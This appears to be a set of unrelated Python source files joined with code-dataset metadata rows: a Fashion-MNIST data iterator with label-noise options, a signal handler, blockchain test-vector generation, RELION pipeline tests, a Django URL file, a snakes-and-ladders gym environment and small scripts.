# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Provide data iterator for MNIST examples.
"""
import argparse
import random
import os
import numpy
import struct
import zlib
import tqdm
import numpy as np
import csv
from imageio import imwrite
from nnabla.logger import logger
from nnabla.utils.data_iterator import data_iterator
from nnabla.utils.data_source import DataSource
from nnabla.utils.data_source_loader import download
def set_seed():
    """Seed the stdlib and NumPy RNGs for reproducible label shuffling.

    NOTE(review): reads the module-global ``args`` parsed in the
    ``__main__`` guard; calling this before argument parsing raises
    NameError -- confirm call order.
    """
    random.seed(args.seed)
    np.random.seed(args.seed)
def load_mnist(train=True):
    """
    Load Fashion-MNIST images and labels, downloading them if not cached.

    Args:
        train (bool): The testing dataset will be returned if False. Training data has 60000 images, while testing has 10000 images.

    Returns:
        numpy.ndarray: Images with shape (#images, 1, 28, 28), dtype uint8,
            values in [0, 255] (raw IDX bytes; no normalization is applied).
        numpy.ndarray: Labels with shape (#images, 1). Values in {0, 1, ..., 9}.
    """
    # NOTE(review): these github.com URLs have no /raw/<branch>/ path segment;
    # confirm they actually serve the .gz payloads (download() may follow
    # redirects or hit a cache).
    if train:
        image_uri = "https://github.com/zalandoresearch/fashion-mnist/train-images-idx3-ubyte.gz"
        label_uri = "https://github.com/zalandoresearch/fashion-mnist/train-labels-idx1-ubyte.gz"
    else:
        image_uri = (
            "https://github.com/zalandoresearch/fashion-mnist/t10k-images-idx3-ubyte.gz"
        )
        label_uri = (
            "https://github.com/zalandoresearch/fashion-mnist/t10k-labels-idx1-ubyte.gz"
        )
    logger.info("Getting label data from {}.".format(label_uri))
    # With python3 we can write this logic as following, but with
    # python2, gzip.object does not support file-like object and
    # urllib.request does not support 'with statement'.
    #
    #   with request.urlopen(label_uri) as r, gzip.open(r) as f:
    #       _, size = struct.unpack('>II', f.read(8))
    #       labels = numpy.frombuffer(f.read(), numpy.uint8).reshape(-1, 1)
    #
    r = download(label_uri)
    # MAX_WBITS | 32 lets zlib auto-detect the gzip header.
    data = zlib.decompress(r.read(), zlib.MAX_WBITS | 32)
    # IDX1 header: magic number, item count (big-endian); count is unused here.
    _, size = struct.unpack(">II", data[0:8])
    labels = numpy.frombuffer(data[8:], numpy.uint8).reshape(-1, 1)
    r.close()
    logger.info("Getting label data done.")

    logger.info("Getting image data from {}.".format(image_uri))
    r = download(image_uri)
    data = zlib.decompress(r.read(), zlib.MAX_WBITS | 32)
    # IDX3 header: magic, image count, rows, cols (big-endian).
    _, size, height, width = struct.unpack(">IIII", data[0:16])
    images = numpy.frombuffer(data[16:], numpy.uint8).reshape(
        size, 1, height, width)
    r.close()
    logger.info("Getting image data done.")

    return images, labels
class FashionMnistDataSource(DataSource):
    """
    NNabla DataSource that loads Fashion-MNIST directly from the Internet.

    Optionally produces a third variable ("shuffle") holding labels that were
    artificially corrupted for a fraction of the training samples.
    """

    def _get_data(self, position):
        # `position` indexes into the (possibly permuted) epoch order.
        image = self._images[self._indexes[position]]
        label = self._labels[self._indexes[position]]
        # NOTE(review): reads the module-global CLI `args`, not the
        # constructor's label_shuffle flag -- they can disagree; confirm.
        if args.label_shuffle and self._train:
            shuffle = self._shuffle_label[self._indexes[position]]
            return (image, label, shuffle)
        else:
            return (image, label)

    def __init__(
        self,
        train=True,
        shuffle=False,
        rng=None,
        label_shuffle=False,
        label_shuffle_rate=0.1,
    ):
        """Download the split and optionally build corrupted labels.

        Args:
            train (bool): Use the training split when True, test otherwise.
            shuffle (bool): Permute the sample order each epoch.
            rng: numpy RandomState; a fixed-seed one is created when None.
            label_shuffle (bool): Build an artificially mislabeled copy.
            label_shuffle_rate (float): Fraction of samples to mislabel.
        """
        super(FashionMnistDataSource, self).__init__(shuffle=shuffle)
        self._train = train

        self._images, self._labels = load_mnist(train)
        if label_shuffle:
            # NOTE(review): raw_label is never used afterwards -- dead store?
            raw_label = self._labels.copy()
            self.shuffle_rate = label_shuffle_rate
            self._shuffle_label = self.label_shuffle()
            print(f"{self.shuffle_rate*100}% of data was shuffled ")
            print(
                "shuffle_label_number: ", len(
                    np.where(self._labels != self._shuffle_label)[0]),
            )
        self._size = self._labels.size
        # NOTE(review): global `args` again (see _get_data) -- if it disagrees
        # with the label_shuffle parameter, _shuffle_label may be undefined.
        if args.label_shuffle and train:
            self._variables = ("x", "y", "shuffle")
        else:
            self._variables = ("x", "y")
        if rng is None:
            rng = numpy.random.RandomState(313)  # fixed seed for reproducibility
        self.rng = rng
        self.reset()

    def label_shuffle(self):
        """Return a copy of the labels with ~shuffle_rate of them corrupted.

        The corrupted entries of each class are drawn evenly from the other
        classes, then shuffled into random positions within the class.
        """
        num_cls = int(np.max(self._labels)) + 1
        shuffle_label = self._labels.copy()
        # Number of samples to corrupt per class.
        extract_num = int(len(self._labels) * self.shuffle_rate // num_cls)
        for i in range(num_cls):
            extract_ind = np.where(self._labels == i)[0]
            labels = [j for j in range(num_cls)]
            labels.remove(i)  # candidate of shuffle label (never the true class)
            # NOTE(review): the comprehension variable `i` shadows the class
            # loop variable inside this expression -- works, but confusing.
            artificial_label = [
                labels[int(i) % (num_cls - 1)] for i in range(int(extract_num))
            ]
            artificial_label = np.array(
                random.sample(artificial_label, len(artificial_label))
            ).astype("float32")
            # Start from all-true labels, overwrite the tail, then shuffle
            # so corrupted entries land at random positions in the class.
            convert_label = np.array([i for _ in range(len(extract_ind))])
            convert_label[-extract_num:] = artificial_label
            random.shuffle(convert_label)
            shuffle_label[extract_ind] = convert_label.reshape(-1, 1)
        return shuffle_label

    def reset(self):
        """Recompute the epoch ordering (permuted when shuffle is on)."""
        if self._shuffle:
            self._indexes = self.rng.permutation(self._size)
        else:
            self._indexes = numpy.arange(self._size)
        super(FashionMnistDataSource, self).reset()

    @property
    def images(self):
        """Get copy of whole data with a shape of (N, 1, H, W)."""
        return self._images.copy()

    @property
    def labels(self):
        """Get copy of whole label with a shape of (N, 1)."""
        return self._labels.copy()

    @property
    def shuffle_labels(self):
        """Get copy of the corrupted labels (only set when label_shuffle)."""
        return self._shuffle_label.copy()
def data_iterator_fashion_mnist(
    batch_size,
    train=True,
    rng=None,
    shuffle=True,
    with_memory_cache=False,
    with_file_cache=False,
    label_shuffle=False,
    label_shuffle_rate=0.1,
):
    """Build a DataIterator over :py:class:`FashionMnistDataSource`.

    Both cache options default to False because the whole dataset fits in
    memory inside :py:class:`FashionMnistDataSource` itself.

    Example:

    .. code-block:: python

        with data_iterator_fashion_mnist(batch_size, True) as di:
            for data in di:
                ...  # use data
    """
    source = FashionMnistDataSource(
        train=train,
        shuffle=shuffle,
        rng=rng,
        label_shuffle=label_shuffle,
        label_shuffle_rate=label_shuffle_rate,
    )
    return data_iterator(
        source,
        batch_size,
        rng,
        with_memory_cache,
        with_file_cache,
    )
def data_iterator_to_csv(csv_path, csv_file_name, data_path, data_iterator, shuffle):
    """Dump one epoch of ``data_iterator`` as PNG files plus an index CSV.

    Args:
        csv_path: directory the CSV (and image tree) is written under.
        csv_file_name: name of the CSV file.
        data_path: prefix used for the per-image file names inside the CSV.
        data_iterator: iterator yielding (images, labels[, shuffled_labels]).
        shuffle: if True, the iterator also carries shuffled labels and the
            CSV gains an "original_label" column.

    Returns:
        The list of CSV rows that were written (header included).
    """
    labels = [
        "T-shirt/top",
        "Trouser",
        "Pullover",
        "Dress",
        "Coat",
        "Sandal",
        "Shirt",
        "Sneaker",
        "Bag",
        "Ankle_boot",
    ]
    # Header: one label-name column list, plus the original label if shuffled.
    if shuffle:
        header = ["x:image", "y:label;" + ";".join(labels), "original_label"]
    else:
        header = ["x:image", "y:label;" + ";".join(labels)]
    csv_data = [header]
    sample_index = 0
    with data_iterator as data:
        progress = tqdm.tqdm(total=data.size, unit="images")
        initial_epoch = data.epoch
        # Consume exactly one epoch of batches.
        while data.epoch == initial_epoch:
            d = data.next()
            for i in range(len(d[0])):
                label = d[1][i][0]
                file_name = (
                    data_path
                    + "/{}".format(labels[label])
                    + "/{}.png".format(sample_index)
                )
                full_path = os.path.join(
                    csv_path, file_name.replace("/", os.path.sep)
                )
                directory = os.path.dirname(full_path)
                if not os.path.exists(directory):
                    os.makedirs(directory)
                imwrite(full_path, d[0][i].reshape(28, 28))
                if shuffle:
                    csv_data.append([file_name, d[2][i][0], label])
                else:
                    csv_data.append([file_name, label])
                sample_index += 1
                progress.update(1)
        progress.close()
    with open(os.path.join(csv_path, csv_file_name), "w") as f:
        csv.writer(f, lineterminator="\n").writerows(csv_data)
    return csv_data
def main():
    """Download Fashion-MNIST and materialise it as PNGs plus index CSVs."""
    path = os.path.abspath(os.path.dirname(__file__))
    # Training set; optionally with artificially shuffled labels.
    logger.log(99, "Downloading Fashion MNIST dataset...")
    train_di = data_iterator_fashion_mnist(
        60000,
        True,
        None,
        False,
        label_shuffle=args.label_shuffle,
        label_shuffle_rate=args.shuffle_rate,
    )
    if args.label_shuffle:
        logger.log(99, 'Creating "fashion_mnist_training_shuffle.csv"... ')
        train_csv = data_iterator_to_csv(  # return value unused; kept for parity
            path,
            "fashion_mnist_training_shuffle.csv",
            os.path.join(os.getcwd(), "training"),
            train_di,
            shuffle=args.label_shuffle,
        )
    else:
        logger.log(99, 'Creating "fashion_mnist_training.csv"... ')
        train_csv = data_iterator_to_csv(
            path,
            "fashion_mnist_training.csv",
            os.path.join(os.getcwd(), "training"),
            train_di,
            shuffle=False,
        )
    # Test set; never label-shuffled.
    validation_di = data_iterator_fashion_mnist(10000, False, None, False)
    logger.log(99, 'Creating "fashion_mnist_test.csv"... ')
    test_csv = data_iterator_to_csv(
        path,
        "fashion_mnist_test.csv",
        os.path.join(os.getcwd(), "validation"),
        validation_di,
        shuffle=False,
    )
    logger.log(99, "Dataset creation completed successfully.")
if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument(
        "--label_shuffle", action="store_true", help="generate label shuffled dataset"
    )
    parser.add_argument("--seed", type=int, default=0)
    parser.add_argument("--shuffle_rate", type=float, default=0.1)
    args = parser.parse_args()
    # NOTE(review): --seed is parsed but never handed to set_seed(); confirm
    # whether set_seed(args.seed) was intended.
    set_seed()
    print("Label Shuffle: ", args.label_shuffle)
    main()
| 5,631 | 0 | 203 |
96264eefbcc71d8bbbe887923f0da92571272ddf | 1,640 | py | Python | dino/utils/handlers.py | thenetcircle/dino | 1047c3458e91a1b4189e9f48f1393b3a68a935b3 | [
"Apache-2.0"
] | 150 | 2016-10-05T11:09:36.000Z | 2022-03-06T16:24:41.000Z | dino/utils/handlers.py | thenetcircle/dino | 1047c3458e91a1b4189e9f48f1393b3a68a935b3 | [
"Apache-2.0"
] | 27 | 2017-03-02T03:37:02.000Z | 2022-02-10T04:59:54.000Z | dino/utils/handlers.py | thenetcircle/dino | 1047c3458e91a1b4189e9f48f1393b3a68a935b3 | [
"Apache-2.0"
] | 21 | 2016-11-11T07:51:48.000Z | 2020-04-26T21:38:33.000Z | #!/usr/bin/env python
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import signal
__author__ = 'Oscar Eriksson <oscar.eriks@gmail.com>'
| 27.79661 | 74 | 0.646951 | #!/usr/bin/env python
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import signal
__author__ = 'Oscar Eriksson <oscar.eriks@gmail.com>'
class GracefulInterruptHandler(object):
    """Context manager that turns a signal (SIGINT by default) into a flag.

    While the context is active, receiving the signal sets ``interrupted``
    instead of killing the process, so loops can finish the current
    iteration and exit cleanly.
    """

    def __init__(self, sig=signal.SIGINT):
        self.sig = sig
        self.interrupted = False
        self.released = False
        self.original_handler = None

    def __enter__(self):
        self.interrupted = False
        self.released = False
        # Remember the previous handler so release() can restore it.
        self.original_handler = signal.getsignal(self.sig)

        def handler(signum, frame):
            self.release()
            self.interrupted = True

        try:
            signal.signal(self.sig, handler)
        except ValueError:
            # signal.signal() only works in the main thread; when testing
            # (or in a worker thread) just skip the installation.
            pass
        return self

    def __exit__(self, exc_type, exc_value, traceback):
        self.release()

    def release(self):
        """Restore the original handler; return False if already released."""
        if self.released:
            return False
        try:
            signal.signal(self.sig, self.original_handler)
        except ValueError:
            # Same main-thread restriction as in __enter__; ignore.
            pass
        self.released = True
        return True
| 858 | 18 | 130 |
d36b0c4d3e977cd2d94ae76b9ab736a7585a4e6b | 1,408 | py | Python | e2e/Vectors/Generation/Consensus/MeritRemoval/Multiple.py | kayabaNerve/Currency | 260ebc20f1704f42ad6183fee39ad58ec6d07961 | [
"CC0-1.0"
] | 66 | 2019-01-14T08:39:52.000Z | 2022-01-06T11:39:15.000Z | e2e/Vectors/Generation/Consensus/MeritRemoval/Multiple.py | kayabaNerve/Currency | 260ebc20f1704f42ad6183fee39ad58ec6d07961 | [
"CC0-1.0"
] | 228 | 2019-01-16T15:42:44.000Z | 2022-02-05T07:48:07.000Z | e2e/Vectors/Generation/Consensus/MeritRemoval/Multiple.py | kayabaNerve/Currency | 260ebc20f1704f42ad6183fee39ad58ec6d07961 | [
"CC0-1.0"
] | 19 | 2019-01-14T08:53:04.000Z | 2021-11-03T20:19:28.000Z | import json
import json

from e2e.Libs.BLS import PrivateKey, PublicKey

from e2e.Classes.Consensus.DataDifficulty import SignedDataDifficulty
from e2e.Classes.Consensus.MeritRemoval import SignedMeritRemoval

from e2e.Vectors.Generation.PrototypeChain import PrototypeChain

proto: PrototypeChain = PrototypeChain(1, False)

blsPrivKey: PrivateKey = PrivateKey(0)
blsPubKey: PublicKey = blsPrivKey.toPublicKey()

# First conflict: two DataDifficulties that share nonce 0 but disagree on
# the difficulty value.
dataDiff: SignedDataDifficulty = SignedDataDifficulty(3, 0)
dataDiff.sign(0, blsPrivKey)
dataDiffConflicting: SignedDataDifficulty = SignedDataDifficulty(1, 0)
dataDiffConflicting.sign(0, blsPrivKey)

# MeritRemoval built from the first conflicting pair; archive the elements.
mr1: SignedMeritRemoval = SignedMeritRemoval(dataDiff, dataDiffConflicting)
proto.add(elements=[dataDiff, dataDiffConflicting])

# Second conflict: the same pattern repeated at nonce 1.
dataDiff = SignedDataDifficulty(3, 1)
dataDiff.sign(0, blsPrivKey)
dataDiffConflicting = SignedDataDifficulty(1, 1)
dataDiffConflicting.sign(0, blsPrivKey)

# MeritRemoval built from the second conflicting pair.
mr2: SignedMeritRemoval = SignedMeritRemoval(dataDiff, dataDiffConflicting)

# Emit the test vector: the blockchain plus both removals.
with open("e2e/Vectors/Consensus/MeritRemoval/Multiple.json", "w") as vectors:
    vectors.write(json.dumps({
        "blockchain": proto.toJSON(),
        "removals": [mr1.toSignedJSON(), mr2.toSignedJSON()]
    }))
| 34.341463 | 78 | 0.810369 | import json
from e2e.Libs.BLS import PrivateKey, PublicKey
from e2e.Classes.Consensus.DataDifficulty import SignedDataDifficulty
from e2e.Classes.Consensus.MeritRemoval import SignedMeritRemoval
from e2e.Vectors.Generation.PrototypeChain import PrototypeChain
proto: PrototypeChain = PrototypeChain(1, False)
blsPrivKey: PrivateKey = PrivateKey(0)
blsPubKey: PublicKey = blsPrivKey.toPublicKey()
#Create a DataDifficulty.
dataDiff: SignedDataDifficulty = SignedDataDifficulty(3, 0)
dataDiff.sign(0, blsPrivKey)
#Create a conflicting DataDifficulty with the same nonce.
dataDiffConflicting: SignedDataDifficulty = SignedDataDifficulty(1, 0)
dataDiffConflicting.sign(0, blsPrivKey)
#Create a MeritRemoval out of the two of them.
mr1: SignedMeritRemoval = SignedMeritRemoval(dataDiff, dataDiffConflicting)
proto.add(elements=[dataDiff, dataDiffConflicting])
#Create two more DataDifficulties with a different nonce.
dataDiff = SignedDataDifficulty(3, 1)
dataDiff.sign(0, blsPrivKey)
dataDiffConflicting = SignedDataDifficulty(1, 1)
dataDiffConflicting.sign(0, blsPrivKey)
#Create another MeritRemoval out of these two.
mr2: SignedMeritRemoval = SignedMeritRemoval(dataDiff, dataDiffConflicting)
with open("e2e/Vectors/Consensus/MeritRemoval/Multiple.json", "w") as vectors:
vectors.write(json.dumps({
"blockchain": proto.toJSON(),
"removals": [mr1.toSignedJSON(), mr2.toSignedJSON()]
}))
| 0 | 0 | 0 |
1ba7c7976cfc6994b6bba52a66714b7218cb51cb | 5,451 | py | Python | tests/parser/test_relion_pipeline.py | DiamondLightSource/python-relion | 8ff1f87510f1a8971a5fd8d217eb17cbea78731d | [
"BSD-3-Clause"
] | 5 | 2020-07-20T04:18:25.000Z | 2022-02-12T13:40:48.000Z | tests/parser/test_relion_pipeline.py | DiamondLightSource/python-relion | 8ff1f87510f1a8971a5fd8d217eb17cbea78731d | [
"BSD-3-Clause"
] | 97 | 2020-07-17T18:20:06.000Z | 2022-03-31T10:28:47.000Z | tests/parser/test_relion_pipeline.py | DiamondLightSource/python-relion | 8ff1f87510f1a8971a5fd8d217eb17cbea78731d | [
"BSD-3-Clause"
] | 1 | 2020-10-30T11:07:03.000Z | 2020-10-30T11:07:03.000Z | import pathlib
import sys
import pytest
from relion._parser.processgraph import ProcessGraph
from relion._parser.processnode import ProcessNode
from relion._parser.relion_pipeline import RelionPipeline
@pytest.fixture
@pytest.fixture
@pytest.fixture
@pytest.fixture
@pytest.fixture
@pytest.mark.skipif(sys.platform == "win32", reason="does not run on windows")
| 33.857143 | 88 | 0.737663 | import pathlib
import sys
import pytest
from relion._parser.processgraph import ProcessGraph
from relion._parser.processnode import ProcessNode
from relion._parser.relion_pipeline import RelionPipeline
@pytest.fixture
def next_node_01():
    """A free-standing MotionCorr job node."""
    return ProcessNode("MotionCorr/job002")


@pytest.fixture
def next_node_02():
    """A free-standing CtfFind job node."""
    return ProcessNode("CtfFind/job003")


@pytest.fixture
def node_with_links(next_node_01, next_node_02):
    """An Import node linked forward to both downstream nodes."""
    root = ProcessNode("Import/job001")
    root.link_to(next_node_01)
    root.link_to(next_node_02)
    return root


@pytest.fixture
def graph(node_with_links, next_node_01, next_node_02):
    """A three-node process graph rooted at the Import node."""
    return ProcessGraph("process graph", [node_with_links, next_node_01, next_node_02])


@pytest.fixture
def pipeline(graph):
    """A pipeline over *graph* in which every node counts as a job node."""
    rp = RelionPipeline("Import/job001", graph)
    rp._job_nodes = rp._nodes
    return rp
def test_relion_pipeline_iterator_with_preprepared_pipeline(
    pipeline, node_with_links, next_node_01, next_node_02
):
    """Iterating the pipeline yields the job names in traversal order."""
    assert list(pipeline) == ["Import", "MotionCorr", "CtfFind"]


def test_relion_pipeline_load_files_from_star(dials_data):
    """All nodes are registered, but only jobs become job nodes."""
    pipeline = RelionPipeline("Import/job001")
    pipeline.load_nodes_from_star(
        dials_data("relion_tutorial_data", pathlib=True) / "default_pipeline.star"
    )
    assert "Extract/job018" in pipeline._nodes
    assert "Class2D/job008/run_it025_model.star" in pipeline._nodes
    assert "Extract/job018" in pipeline._job_nodes
    assert "Class2D/job008/run_it025_model.star" not in pipeline._job_nodes


def test_relion_pipeline_check_job_node_statuses(dials_data):
    """Finished tutorial jobs carry a truthy status after the check."""
    pipeline = RelionPipeline("Import/job001")
    pipeline.load_nodes_from_star(
        dials_data("relion_tutorial_data", pathlib=True) / "default_pipeline.star"
    )
    pipeline.check_job_node_statuses(
        pathlib.Path(dials_data("relion_tutorial_data", pathlib=True))
    )
    assert pipeline._job_nodes[pipeline._job_nodes.index("Extract/job018")].environment[
        "status"
    ]
    assert pipeline._job_nodes[pipeline._job_nodes.index("Class2D/job008")].environment[
        "status"
    ]


def test_relion_pipeline_current_jobs_property_without_any_start_time_information(
    dials_data,
):
    """Without timing information there is no notion of a current job."""
    pipeline = RelionPipeline("Import/job001")
    pipeline.load_nodes_from_star(
        dials_data("relion_tutorial_data", pathlib=True) / "default_pipeline.star"
    )
    pipeline.check_job_node_statuses(dials_data("relion_tutorial_data", pathlib=True))
    assert pipeline.current_jobs is None


def test_relion_pipeline_collect_job_times_from_dials_data_logs(dials_data):
    """Start times and run counts are recovered from the pipeline logs."""
    pipeline = RelionPipeline("Import/job001")
    pipeline.load_nodes_from_star(
        dials_data("relion_tutorial_data", pathlib=True) / "default_pipeline.star"
    )
    logs = list(dials_data("relion_tutorial_data", pathlib=True).glob("pipeline*.log"))
    assert (
        dials_data("relion_tutorial_data", pathlib=True) / "pipeline_PREPROCESS.log"
        in logs
    )
    pipeline.collect_job_times(logs)
    for job in pipeline._job_nodes:
        assert job.environment["start_time_stamp"] is not None
    # MotionCorr ran twice in the tutorial data, Class2D only once.
    assert (
        pipeline._job_nodes[pipeline._job_nodes.index("MotionCorr/job002")].environment[
            "job_count"
        ]
        == 2
    )
    assert (
        pipeline._job_nodes[pipeline._job_nodes.index("Class2D/job008")].environment[
            "job_count"
        ]
        == 1
    )


def test_relion_pipeline_current_jobs_property_with_timing_info(dials_data):
    """A job with timing data but no status is reported as current."""
    pipeline = RelionPipeline("Import/job001")
    pipeline.load_nodes_from_star(
        dials_data("relion_tutorial_data", pathlib=True) / "default_pipeline.star"
    )
    logs = list(dials_data("relion_tutorial_data", pathlib=True).glob("pipeline*.log"))
    pipeline.collect_job_times(logs)
    pipeline.check_job_node_statuses(
        pathlib.Path(dials_data("relion_tutorial_data", pathlib=True))
    )
    pipeline._job_nodes[pipeline._job_nodes.index("LocalRes/job031")].environment[
        "status"
    ] = None
    assert str(pipeline.current_jobs[0]._path) == "LocalRes/job031"


def test_relion_pipeline_current_jobs_property_with_timing_info_multiple_jobs(
    dials_data,
):
    """Several unfinished jobs are all reported as current."""
    pipeline = RelionPipeline("Import/job001")
    pipeline.load_nodes_from_star(
        dials_data("relion_tutorial_data", pathlib=True) / "default_pipeline.star"
    )
    logs = list(dials_data("relion_tutorial_data", pathlib=True).glob("pipeline*.log"))
    pipeline.collect_job_times(logs)
    pipeline.check_job_node_statuses(dials_data("relion_tutorial_data", pathlib=True))
    pipeline._job_nodes[pipeline._job_nodes.index("LocalRes/job031")].environment[
        "status"
    ] = None
    pipeline._job_nodes[pipeline._job_nodes.index("MotionCorr/job002")].environment[
        "status"
    ] = None
    assert [str(cj._path) for cj in pipeline.current_jobs] == [
        "MotionCorr/job002",
        "LocalRes/job031",
    ]


@pytest.mark.skipif(sys.platform == "win32", reason="does not run on windows")
def test_get_pipeline_jobs_from_preprocess_log_file(dials_data):
    """Jobs recorded in the PREPROCESS log can be extracted directly."""
    pipeline = RelionPipeline("Import/job001")
    pipeline.load_nodes_from_star(
        dials_data("relion_tutorial_data", pathlib=True) / "default_pipeline.star"
    )
    preproc_jobs = pipeline._get_pipeline_jobs(
        dials_data("relion_tutorial_data", pathlib=True) / "pipeline_PREPROCESS.log"
    )
    assert "MotionCorr/job002" in preproc_jobs
| 4,776 | 0 | 293 |
01122030ff57d9377ddf61352858ba09c5197d30 | 139 | py | Python | blog/urls.py | 31-13/portfolio | 86d69abc05ead28823db5def49622f04af0ebfd2 | [
"MIT"
] | null | null | null | blog/urls.py | 31-13/portfolio | 86d69abc05ead28823db5def49622f04af0ebfd2 | [
"MIT"
] | null | null | null | blog/urls.py | 31-13/portfolio | 86d69abc05ead28823db5def49622f04af0ebfd2 | [
"MIT"
] | null | null | null | from django.contrib import admin
from django.urls import path

from .views import blog

# Map the app root URL to the blog view.
urlpatterns = [
    path('', blog, name='blog'),
]
| 15.444444 | 32 | 0.705036 | from django.contrib import admin
from django.urls import path
from .views import blog
urlpatterns = [
path('', blog, name='blog'),
]
| 0 | 0 | 0 |
b34a1a7f59c7bf1d720c23f8b819112a2334aac4 | 1,506 | py | Python | code/snake_env.py | seahailang/LearningReinforcementLearning | f5b2425c352742440b3da0d428454fe29066129b | [
"MIT"
] | null | null | null | code/snake_env.py | seahailang/LearningReinforcementLearning | f5b2425c352742440b3da0d428454fe29066129b | [
"MIT"
] | null | null | null | code/snake_env.py | seahailang/LearningReinforcementLearning | f5b2425c352742440b3da0d428454fe29066129b | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# encoding: utf-8
"""
@version: 0.0
@author: hailang
@Email: seahailang@gmail.com
@software: PyCharm
@file: snake_env.py
@time: 2018/6/21 15:45
"""
import numpy as np
import gym
from gym.spaces import Discrete
if __name__ == '__main__':
s = SnakeEnv(10,[10]) | 22.818182 | 84 | 0.573705 | #!/usr/bin/env python
# encoding: utf-8
"""
@version: 0.0
@author: hailang
@Email: seahailang@gmail.com
@software: PyCharm
@file: snake_env.py
@time: 2018/6/21 15:45
"""
import numpy as np
import gym
from gym.spaces import Discrete
class SnakeEnv(gym.Env):
    """Snakes-and-ladders board game exposed as a gym environment.

    The board has ``SIZE`` squares.  ``ladder_num`` two-way ladders are
    placed at random, and each action selects one die from ``dices``
    (each value is that die's maximum face).
    """

    SIZE = 100

    def __init__(self, ladder_num, dices):
        self.ladder_num = ladder_num
        self.dices = dices
        # Random ladder endpoints, stored as a position -> position mapping.
        self.ladders = dict(np.random.randint(1, self.SIZE, size=(self.ladder_num, 2)))
        self.observation_space = Discrete(self.SIZE + 1)
        self.action_space = Discrete(len(dices))
        # Make every ladder traversable in both directions.
        for top, bottom in list(self.ladders.items()):
            self.ladders[bottom] = top
        print('ladders info:')
        print(self.ladders)
        print('dice ranges')
        print(self.dices)
        self.pos = 1

    def _reset(self):
        """Put the player back on square 1 and return the position."""
        self.pos = 1
        return self.pos

    def _step(self, a):
        """Advance using die ``a``; return (observation, reward, done, info)."""
        roll = np.random.randint(1, self.dices[a] + 1)
        self.pos += roll
        if self.pos == 100:
            return 100, 100, 1, {}
        elif self.pos > 100:
            # Overshooting bounces the player back from square 100.
            self.pos = 200 - self.pos
        if self.pos in self.ladders:
            self.pos = self.ladders[self.pos]
        return self.pos, -1, 0, {}

    def reward(self, s):
        """Reward for landing on square ``s``: 100 at the goal, -1 otherwise."""
        if s == 100:
            return 100
        return -1
if __name__ == '__main__':
s = SnakeEnv(10,[10]) | 1,189 | 124 | 23 |
dc0ceb405fac2cc1c20a9c0c0bcc6ae5f2dd07e9 | 134 | py | Python | Curso em video/Desafios1-20/Desafio6.py | Ry18-2003/Python-Journey | c926a733a578f3686767a1189bdccb4df137856d | [
"MIT"
] | null | null | null | Curso em video/Desafios1-20/Desafio6.py | Ry18-2003/Python-Journey | c926a733a578f3686767a1189bdccb4df137856d | [
"MIT"
] | null | null | null | Curso em video/Desafios1-20/Desafio6.py | Ry18-2003/Python-Journey | c926a733a578f3686767a1189bdccb4df137856d | [
"MIT"
] | null | null | null | n1 = int(input('Digite um número: '))
print(f'O dobro do número {n1} é {n1*2} o seu triplo {n1*3} e sua raiz quadrada é {n1**(1/2)}')
| 44.666667 | 95 | 0.626866 | n1 = int(input('Digite um número: '))
print(f'O dobro do número {n1} é {n1*2} o seu triplo {n1*3} e sua raiz quadrada é {n1**(1/2)}')
| 0 | 0 | 0 |
db29771268ea3ecddcf9d2fab597b5974c1769e6 | 532 | py | Python | testPython.py | nbcallah/Histogram-Sampler | 9360ea5c9923896a8ae63f5b7165f070645a8310 | [
"MIT"
] | null | null | null | testPython.py | nbcallah/Histogram-Sampler | 9360ea5c9923896a8ae63f5b7165f070645a8310 | [
"MIT"
] | null | null | null | testPython.py | nbcallah/Histogram-Sampler | 9360ea5c9923896a8ae63f5b7165f070645a8310 | [
"MIT"
] | null | null | null | #!/usr/bin/python
import HistGen_py
import numpy
myHist = [100, 300, 300, 700, 900, 600, 400, 200, 300, 100]
myBins = ["infrared", "red", "orange", "yellow", "sour", "green", "teal", "blue", "violet", "ultraviolet"]
myTest = HistGen_py.HistGen(myHist)
for i in range(0,10):
index = myTest.genIndex(numpy.random.randint(0, high=numpy.iinfo(numpy.uint64).max, dtype='uint64'))
while index == len(myHist):
index = myTest.genIndex(numpy.random.randint(0, high=numpy.iinfo(numpy.uint64).max, dtype='uint64'))
print(myBins[index]) | 38 | 106 | 0.695489 | #!/usr/bin/python
import HistGen_py
import numpy
myHist = [100, 300, 300, 700, 900, 600, 400, 200, 300, 100]
myBins = ["infrared", "red", "orange", "yellow", "sour", "green", "teal", "blue", "violet", "ultraviolet"]
myTest = HistGen_py.HistGen(myHist)
for i in range(0,10):
index = myTest.genIndex(numpy.random.randint(0, high=numpy.iinfo(numpy.uint64).max, dtype='uint64'))
while index == len(myHist):
index = myTest.genIndex(numpy.random.randint(0, high=numpy.iinfo(numpy.uint64).max, dtype='uint64'))
print(myBins[index]) | 0 | 0 | 0 |
0fbe8b57c499b0a10f013e8738f4d89643439151 | 229 | py | Python | apronpy/cdll.py | caterinaurban/apronpy | 8a7e08e6929beeeeb97a9da648499be8c5d18bff | [
"MIT"
] | 7 | 2019-02-19T18:55:13.000Z | 2019-10-08T10:32:40.000Z | apronpy/cdll.py | caterinaurban/apronpy | 8a7e08e6929beeeeb97a9da648499be8c5d18bff | [
"MIT"
] | 3 | 2020-05-26T21:08:29.000Z | 2020-08-28T13:10:47.000Z | apronpy/cdll.py | caterinaurban/apronpy | 8a7e08e6929beeeeb97a9da648499be8c5d18bff | [
"MIT"
] | 1 | 2022-03-29T15:01:27.000Z | 2022-03-29T15:01:27.000Z | """
C DLLs
======
:Author: Caterina Urban
"""
from ctypes import util, CDLL
# Native libraries backing apronpy: the C runtime, the APRON abstract-domain
# library itself, and its arbitrary-precision back-ends (GMP and MPFR).
